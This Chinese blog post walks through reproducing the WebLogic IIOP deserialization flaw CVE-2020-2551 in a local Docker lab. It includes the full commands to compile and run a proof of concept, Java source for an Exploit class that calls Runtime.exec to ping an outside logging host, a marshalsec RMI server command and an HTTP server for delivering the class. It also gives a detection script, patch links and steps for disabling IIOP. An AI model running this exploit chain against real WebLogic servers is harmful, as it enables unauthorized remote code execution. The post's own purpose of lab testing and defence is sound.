[CVE-2020-2551]Weblogic IIOP反序列化漏洞

最新推荐文章于 2024-07-15 17:36:21 发布
最新推荐文章于 2024-07-15 17:36:21 发布
阅读量1.7w 收藏 4
点赞数 1
分类专栏: java 安全 Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/104509330
版权
安全 同时被 3 个专栏收录
264 篇文章 9 订阅
订阅专栏
Web
220 篇文章 7 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

所需jar包:
https://drive.google.com/file/d/1ssc_8kkjLnzVMTO7G2aswIMLxSLD1Ali/view?usp=sharing

#编译
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/javac -cp /Users/caiqiqi/.m2/repository/org/springframework/spring-tx/4.3.16.RELEASE/spring-tx-4.3.16.RELEASE.jar:/Users/caiqiqi/Downloads/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar:. com/cqq/WeblogicCVE_2020_2551.java
#执行
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/java -cp /Users/caiqiqi/Downloads/wlclient.jar:/Users/caiqiqi/.m2/repository/org/springframework/spring-tx/4.3.16.RELEASE/spring-tx-4.3.16.RELEASE.jar:/Users/caiqiqi/.m2/repository/org/springframework/spring-context/4.3.16.RELEASE/spring-context-4.3.16.RELEASE.jar:/Users/caiqiqi/Downloads/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar:. com.cqq.WeblogicCVE_2020_2551 127.0.0.1

WebLogic环境搭建

weblogic环境搭建工具,开始用docker 18搭建不成功,
在这里插入图片描述
升级到docker到19.03.5之后,搭建成功。

失败原因可能说docker内置virtualbox的bug?
参考:
https://blogs.oracle.com/emeapartnerweblogic/weblogic-1212-installation-in-virtualbox-with-0-mhz-by-frank-munz

成功之后:
在这里插入图片描述
南哥牛逼!

参考:
https://github.com/QAX-A-Team/WeblogicEnvironment

下载weblogic,和jdk。然后

# 构建
docker build --build-arg JDK_PKG=jdk-7u21-linux-x64.tar.gz --build-arg WEBLOGIC_JAR=fmw_12.1.3.0.0_wls.jar  -t weblogic12013jdk7u21 .
# 运行
docker run -d -p 7001:7001 -p 8453:8453 -p 5556:5556 --name weblogic12013jdk7u21 weblogic12013jdk7u21

在这里插入图片描述
在这里插入图片描述
启动之后,查看weblogic的调试端口:
在这里插入图片描述
在这里插入图片描述
是8453端口。

最后使用10.3.6.0 + JDK7u21,
然后使用这个项目的代码打成功了,效果如下:
1、编译:

/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/javac -cp lib/com.bea.core.repackaged.apache.commons.logging_1.2.1.jar:lib/com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar:lib/permit-reflect-0.3.jar:lib/wlfullclient.jar com/payload/Main.java

2、执行:

/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/java -cp lib/com.bea.core.repackaged.apache.commons.logging_1.2.1.jar:lib/com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar:lib/permit-reflect-0.3.jar:lib/wlfullclient.jar:. com.payload.Main 127.0.0.1  7001 "rmi://192.168.170.1:1099/Exploit"

javax.naming.NamingException: Unhandled exception in rebind() [Root exception is org.omg.CORBA.MARSHAL:   vmcid: 0x0  minor code: 0  completed: No]
	at weblogic.corba.j2ee.naming.Utils.wrapNamingException(Utils.java:83)
	at weblogic.corba.j2ee.naming.ContextImpl.rebind(ContextImpl.java:392)
	at weblogic.corba.j2ee.naming.ContextImpl.rebind(ContextImpl.java:350)
	at javax.naming.InitialContext.rebind(InitialContext.java:427)
	at com.payload.Main.main(Main.java:46)
Caused by: org.omg.CORBA.MARSHAL:   vmcid: 0x0  minor code: 0  completed: No
	at weblogic.corba.idl.RemoteDelegateImpl.postInvoke(RemoteDelegateImpl.java:477)
	at weblogic.corba.idl.RemoteDelegateImpl.invoke(RemoteDelegateImpl.java:384)
	at weblogic.corba.idl.RemoteDelegateImpl.invoke(RemoteDelegateImpl.java:341)
	at org.omg.CORBA.portable.ObjectImpl._invoke(ObjectImpl.java:475)
	at weblogic.corba.cos.naming._NamingContextAnyStub.rebind_any(_NamingContextAnyStub.java:52)
	at weblogic.corba.j2ee.naming.ContextImpl.rebind(ContextImpl.java:378)
	... 3 more
Caused by: org.omg.CORBA.MARSHAL:   vmcid: 0x0  minor code: 0  completed: No
	at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
	at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:57)
	at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
	at java.lang.reflect.Constructor.newInstance(Constructor.java:526)
	at java.lang.Class.newInstance(Class.java:379)
	at weblogic.iiop.ReplyMessage.getThrowable(ReplyMessage.java:318)
	at weblogic.corba.idl.RemoteDelegateImpl.postInvoke(RemoteDelegateImpl.java:468)
	... 8 more
------------------------
----没有回显   自行检测----
------------------------

监听的HTTP服务

python3 -m http.server 80

下放Exploit.java编译后的Exploit.class文件:

public class Exploit{
        public Exploit(){
	try{
                java.lang.Runtime.getRuntime().exec("ping weblogic.f9daa4b2c9be9ad66693.d.zhack.ca");
        } catch(java.io.IOException e){
		e.printStackTrace();
	}
	}
}

然后使用marshalsec创建一个RMI服务:

java -cp /Users/caiqiqi/GitProjects/marshalsec/target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.170.1/#Exploit" 1099

开始以为是weblogic版本的问题,后来发现JDK7u21 + 12.1.3.0版本也成功了。所以应该是之前的poc的问题了。

在这里插入图片描述

(需要使用小于等于Weblogic的JDK版本的JDK编译Exploit.java)
需要使用低版本的javac进行编译Exploit.java,成功之后的log是这样的:
在这里插入图片描述

若使用高版本的javac编译Exploit.java:
在这里插入图片描述

参考

https://github.com/Y4er/CVE-2020-2551

利用不成功的可以参考这篇文章:
漫谈WebLogic CVE-2020-2551

参考这个poc写出更通用的poc:
https://github.com/0nise/CVE-2020-2551/blob/master/CVE_2020_2551.java
在这里插入图片描述

检测工具:
https://github.com/shadowsock5/notes/blob/master/CVE-2020-2551.jar

python集成检测代码:

        jar_2551 = "2551.jar"
        command = "java -jar {0} {1} {2} http://{3}.{4}/cve_2020_2551".format(jar_2551, host, port, self.BANNER, self.DOMAIN)
        VULN_YES = "vul ok"
        VULN_NO  = "vul error"
        is_vuln = False

        print(command)
        #os.system(command)
        r = os.popen(command)

        info = r.readlines()    # 那命令执行结果以一个数组的形式读进来
        for i in info:
            logger.info(i)
        vuln_flag = info[2]
        if vuln_flag:
            if VULN_YES in vuln_flag:
                is_vuln = True
            elif VULN_NO in vuln_flag:
                is_vuln = False

修复

参考以下链接安装补丁更新: https://www.oracle.com/security-alerts/cpujan2020.html

缓解措施:

可以通过临时关闭IIOP协议对该漏洞进行缓解。操作如下:

在Weblogic控制台中,选择“环境”->“服务器”->”AdminServer”->”协议”,取消“启用IIOP”的勾选。并重启Weblogic项目,使配置生效。
在这里插入图片描述

禁用IIOP生效前:
在这里插入图片描述

生效后:
在这里插入图片描述

参考:

  • https://docs.oracle.com/middleware/11119/wls/WLACH/taskhelp/channels/EnableAndConfigureIIOP.html

关于com.bea.core.repackaged
开始以为PoC里的JtaTransactionManager是Spring自带的org.springframework.transaction.jta.JtaTransactionManager,后来看大家的poc才知道这个类是weblogic自带的com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager,不深入研究了。
在这里插入图片描述

排错

如果出现以下错误,可能是因为IIOP被禁用:

Exception in thread "main" javax.naming.NamingException: Couldn't connect to the specified host :  [Root exception is org.omg.CORBA.COMM_FAILURE:   vmcid: SUN  minor code: 208 completed: Maybe]
	at weblogic.corba.j2ee.naming.Utils.wrapNamingException(Utils.java:83)
	at weblogic.corba.j2ee.naming.ORBHelper.getORBReferenceWithRetry(ORBHelper.java:656)
	at weblogic.corba.j2ee.naming.ORBHelper.getORBReference(ORBHelper.java:594)
	at weblogic.corba.j2ee.naming.InitialContextFactoryImpl.getInitialContext(InitialContextFactoryImpl.java:85)
	at weblogic.corba.j2ee.naming.InitialContextFactoryImpl.getInitialContext(InitialContextFactoryImpl.java:31)
	at weblogic.jndi.WLInitialContextFactory.getInitialContext(WLInitialContextFactory.java:46)
	at javax.naming.spi.NamingManager.getInitialContext(NamingManager.java:684)
	at javax.naming.InitialContext.getDefaultInitCtx(InitialContext.java:313)
	at javax.naming.InitialContext.init(InitialContext.java:244)
	at javax.naming.InitialContext.<init>(InitialContext.java:216)
	at ysoserial.CVE_2020_2551.main(CVE_2020_2551.java:20)
Caused by: org.omg.CORBA.COMM_FAILURE:   vmcid: SUN  minor code: 208 completed: Maybe
	at com.sun.corba.se.impl.logging.ORBUtilSystemException.connectionAbort(ORBUtilSystemException.java:2400)
	at com.sun.corba.se.impl.logging.ORBUtilSystemException.connectionAbort(ORBUtilSystemException.java:2418)
	at com.sun.corba.se.impl.transport.SocketOrChannelConnectionImpl.readBits(SocketOrChannelConnectionImpl.java:372)
	at com.sun.corba.se.impl.transport.SocketOrChannelConnectionImpl.read(SocketOrChannelConnectionImpl.java:307)
	at com.sun.corba.se.impl.transport.ReaderThreadImpl.doWork(ReaderThreadImpl.java:98)
	at com.sun.corba.se.impl.orbutil.threadpool.ThreadPoolImpl$WorkerThread.performWork(ThreadPoolImpl.java:490)
	at com.sun.corba.se.impl.orbutil.threadpool.ThreadPoolImpl$WorkerThread.run(ThreadPoolImpl.java:519)
Caused by: org.omg.CORBA.COMM_FAILURE:   vmcid: SUN  minor code: 211  completed: No
	at com.sun.corba.se.impl.logging.ORBUtilSystemException.ioexceptionWhenReadingConnection(ORBUtilSystemException.java:2484)
	at com.sun.corba.se.impl.logging.ORBUtilSystemException.ioexceptionWhenReadingConnection(ORBUtilSystemException.java:2502)
	at com.sun.corba.se.impl.protocol.giopmsgheaders.MessageBase.readGIOPHeader(MessageBase.java:134)
	at com.sun.corba.se.impl.protocol.giopmsgheaders.MessageBase.readGIOPMessage(MessageBase.java:116)
	at com.sun.corba.se.impl.transport.CorbaContactInfoBase.createMessageMediator(CorbaContactInfoBase.java:171)
	at com.sun.corba.se.impl.transport.SocketOrChannelConnectionImpl.readBits(SocketOrChannelConnectionImpl.java:333)
	... 4 more
Caused by: java.io.IOException: End-of-stream
	at com.sun.corba.se.impl.transport.SocketOrChannelConnectionImpl.readFully(SocketOrChannelConnectionImpl.java:684)
	at com.sun.corba.se.impl.transport.SocketOrChannelConnectionImpl.read(SocketOrChannelConnectionImpl.java:545)
	at com.sun.corba.se.impl.protocol.giopmsgheaders.MessageBase.readGIOPHeader(MessageBase.java:130)
	... 7 more

poc依赖的jar包

- wlfullclient.jar
- com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3
- com.bea.core.repackaged.apache.commons.logging_1.2.1.jar

其中wlfullclient.jar的生成方式:
在weblogic安装目录并没有找到这个,参考这个:
https://blog.csdn.net/konglongaa/article/details/78220249

E:\Oracle\Middleware10.3.6.0\wlserver_10.3\server\lib> java -jar wljarbuilder.jar

即可在lib目录生成wlfullclient.jar

caiqiiqi
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Weblogic CVE-2020-2551 IIOP反序列化漏洞复现
锋刃科技的博客
03-06 1388
漏洞概述 攻击者可以通过IIOP协议远程访问Weblogic Server服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。 IIOP协议以Java接口的形式对远程对象进行访问,默认启用。 影响版本 weblogic 10.3.6 weblogic 12.1.3.0 weblogic 12.2.1.3.0 weblogic 12.2.1.4.0 环境搭建 下载地址 https://www.oracle.com/m...
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2024-2628 CVE-2024-21839复现)_weblogic payload
2301_77121488的博客
05-13 1050
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。JRMP是一个Java远程方法协议,该协议基于TCP/IP之上,RMI协议之下。
CVE-2020-14644 weblogic iiop反序列化漏洞分析
爱国小白帽
08-11 2116
360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-081101 报告来源:360CERT 报告作者:ph4nt0mer 更新日期:2020-08-11 0x01 文章简述 2020年7月15日,Oracle发布2020年7月关键补丁更新,其中针对 WebLogic Server Core组件,且评分为9.8的严重漏洞共有4个,360CERT对其中CVE-2020-14644的反序列化利用链进行了分析。 0x02 weblogic 受影响版本
web反序列化漏洞原理/Weblogic IIOP反序列化漏洞CVE-2020-2551漏洞分析_新手白客教学
程序员六七的博客
07-15 908
安全客 - 安全资讯平台
Weblogic IIOP反序列化漏洞CVE-2020-2551
chaojixiaojingang
01-08 2156
1.漏洞描述 Weblogic IIOP反序列化漏洞影响的协议为IIOP协议,该漏洞是由于调用远程对象的实现存在缺陷,导致序列化对象可以任意构造,在使用之前未经安全检查,攻击者可以通过 IIOP 协议远程访问 Weblogic Server 服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。 2.影响版本 10.3.6.0.0 12.1.3.0.0 12.2.1.3.0 12.2.1.4.0 3.漏洞环境搭建 所有环境都是建立在java环境...
Weblogic IIOP反序列化漏洞CVE-2020-2551漏洞分析
whatday的专栏
07-09 5261
0x00 前言 2020年1月15日, Oracle官方发布了CVE-2020-2551漏洞通告,漏洞等级为高危,CVVS评分为9.8分,漏洞利用难度低。影响范围为10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0。 0x01 漏洞分析 从Oracle 官方的CPU公告中可以看出该漏洞存在于weblogic核心组件,影响的协议为IIOP。其实经过分析发现,该漏洞原理上类似于RMI反序列化漏洞CVE-2017-3241),和之前的T3协议所引发的一系列.
Weblogic IIOP反序列化漏洞CVE-2020-2551漏洞复现
sechelper的博客
01-11 1266
cve漏洞详细复现,漏洞利用,反弹shell,工具分享
Weblogic IIOP协议反序列化CVE-2020-2551漏洞复现
Boom!脑洞大爆炸的博客
11-11 2169
Weblogic IIOP协议反序列化CVE-2020-2551)复现
漫谈 WebLogic-CVE-2020-2551
数据库生态圈(RDB & NoSQL & Bigdata)——专注于关系库优化(Oracle&Mysql&PG&SQL Server )
01-14 1424
本文源自:https://paper.seebug.org/1149/#jdk 作者:r4v3zn@白帽汇安全研究院本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送!投稿邮箱:paper@seebug.org 背景 2020 年 1月14日,Oracle 发布了大量安全补丁,修复了 43 个严重漏洞,CVSS 评分均在在9.1以上。 其中 CVE-2020-2551 漏洞,互联网中公布了几篇针对该漏洞的分析文章以及POC,但公布的 POC 有部分不足之处,导致漏洞检测效..
CVE-2023-21839:Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 3943
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE-2020-14644 iiop反序列化漏洞分析1
08-03
CVE-2020-14644:WebLogic IIOP反序列化漏洞详解》 CVE-2020-14644是一个针对Oracle WebLogic Server的严重安全漏洞,它涉及到IIOP(Internet Inter-ORB Protocol)协议中的反序列化问题。此漏洞主要影响了Oracle...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
CVE-2020-2551:具有IIOPWeblogic RCE
03-08
具有IIOPCVE-2020-2551 Weblogic RCE 0x01默认启用IIOP 0x02 Poc演示
cve-2020-2551_poc.py
03-12
cve-2020-2551_poc.py
基于贝叶斯网络BO-Transformer-BiLSTM实现负荷数据回归预测附matlab代码.rar
07-27
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
易语言 - 易语言我的世界3D源码
最新发布
07-27
易语言我的世界3D源码
avif-0.5.0-cp37-cp37m-manylinux2010_i686.whl
07-27
python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决!
Weblogic IIOP反序列化漏洞(CVE-2020-2551)
07-28
嗨!关于Weblogic IIOP反序列化漏洞CVE-2020-2551),以下是一些相关信息: CVE-2020-2551Weblogic Server的一个严重漏洞,该漏洞允许攻击者通过发送特制的T3协议请求来执行任意代码。这个漏洞属于Java反序列化漏洞的一种。 该漏洞的影响版本包括Weblogic Server 10.3.6.0.0、12.1.3.0.0和12.2.1.3.0。攻击者可以利用该漏洞远程执行任意代码,可能导致服务器的完全控制。 Oracle已经发布了安全补丁来修复这个漏洞。建议受影响的用户尽快升级到修复版本,并确保及时应用所有安全补丁。 此外,还可以通过配置防火墙规则、限制网络访问和监控异常行为等方法来增强系统的安全性。 希望这些信息能对你有所帮助!如果还有其他问题,请继续提问。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值